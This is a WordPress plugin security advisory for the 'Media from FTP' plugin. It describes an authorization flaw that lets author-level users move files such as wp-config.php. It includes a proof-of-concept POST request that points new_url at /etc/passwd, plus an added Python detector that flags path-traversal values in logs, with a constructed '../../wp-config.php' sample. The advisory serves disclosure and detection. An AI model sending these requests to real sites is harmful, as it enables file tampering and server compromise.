Description

The plugin does not properly restrict who can use its functionality, which may allow users with author+ privileges to move files around, such as wp-config.php, which may lead to RCE in some cases. In 11.16, the manage_options capability was used; however, this is still insufficient on MultiSite setups.

PoC

1) Go to /wp-admin/admin.php?page=mediafromftp-search-register
2) Select any file from the media text list below
3) Click “Update Media”
4) Intercept request with action=mediafromftp-update-ajax-action
5) Change “new_url” by adding the following to the file path: /…/…/…/…/…/…/…/…/…/…/etc/passwd

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1

action=mediafromftp-update-ajax-action&nonce=9c0c0115ee&maxcount=1&new_url=/etc/passwd&new_datetime=2023-07-10+20%3A53%3A36
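
For detection, the following added example (not part of the original advisory or the plugin's code) inspects captured admin-ajax.php POST bodies for the action above and reports whether new_url resolves outside the uploads directory. The uploads path, the assumption that a legitimate new_url is relative to it, and every sample body except the one from the PoC are constructed for illustration.

```python
import posixpath
from urllib.parse import parse_qs, unquote

ACTION = "mediafromftp-update-ajax-action"          # action name from the PoC
UPLOADS_ROOT = "/var/www/html/wp-content/uploads"   # assumed install path

# Request body from the PoC above.
PAGE_POC = ("action=mediafromftp-update-ajax-action&nonce=9c0c0115ee&maxcount=1"
            "&new_url=/etc/passwd&new_datetime=2023-07-10+20%3A53%3A36")
# Constructed samples: one benign update, one relative path leaving the uploads tree.
BENIGN = ("action=mediafromftp-update-ajax-action&nonce=0000000000&maxcount=1"
          "&new_url=2023/07/photo.jpg&new_datetime=2023-07-10+20%3A53%3A36")
RELATIVE_ESCAPE = ("action=mediafromftp-update-ajax-action&nonce=0000000000&maxcount=1"
                   "&new_url=../../wp-config.php&new_datetime=2023-07-10+20%3A53%3A36")


def resolve_target(new_url, root=UPLOADS_ROOT):
    """Normalise new_url against root (assumption: valid values are relative to it)."""
    # Decode until stable so percent-encoded separators are not missed.
    previous = None
    while previous != new_url:
        previous, new_url = new_url, unquote(new_url)
    new_url = new_url.replace("\\", "/")
    # join() drops root when new_url is absolute, so /etc/passwd resolves to itself.
    return posixpath.normpath(posixpath.join(root, new_url))


def inspect_body(body, root=UPLOADS_ROOT):
    """Return a finding for one form-encoded POST body, or None for other actions."""
    fields = parse_qs(body, keep_blank_values=True)
    if fields.get("action", [""])[0] != ACTION:
        return None
    new_url = fields.get("new_url", [""])[0]
    target = resolve_target(new_url, root)
    inside = target == root or target.startswith(root + "/")
    return {"new_url": new_url, "resolved": target, "escapes_uploads": not inside}


def flag_requests(bodies, root=UPLOADS_ROOT):
    """Keep only the findings whose target lies outside the uploads directory."""
    findings = (inspect_body(body, root) for body in bodies)
    return [f for f in findings if f and f["escapes_uploads"]]


if __name__ == "__main__":
    for finding in flag_requests([PAGE_POC, BENIGN, RELATIVE_ESCAPE]):
        print(finding["new_url"], "->", finding["resolved"])
```

The check is only as accurate as UPLOADS_ROOT, so set it to the real uploads path of the site whose logs are being reviewed.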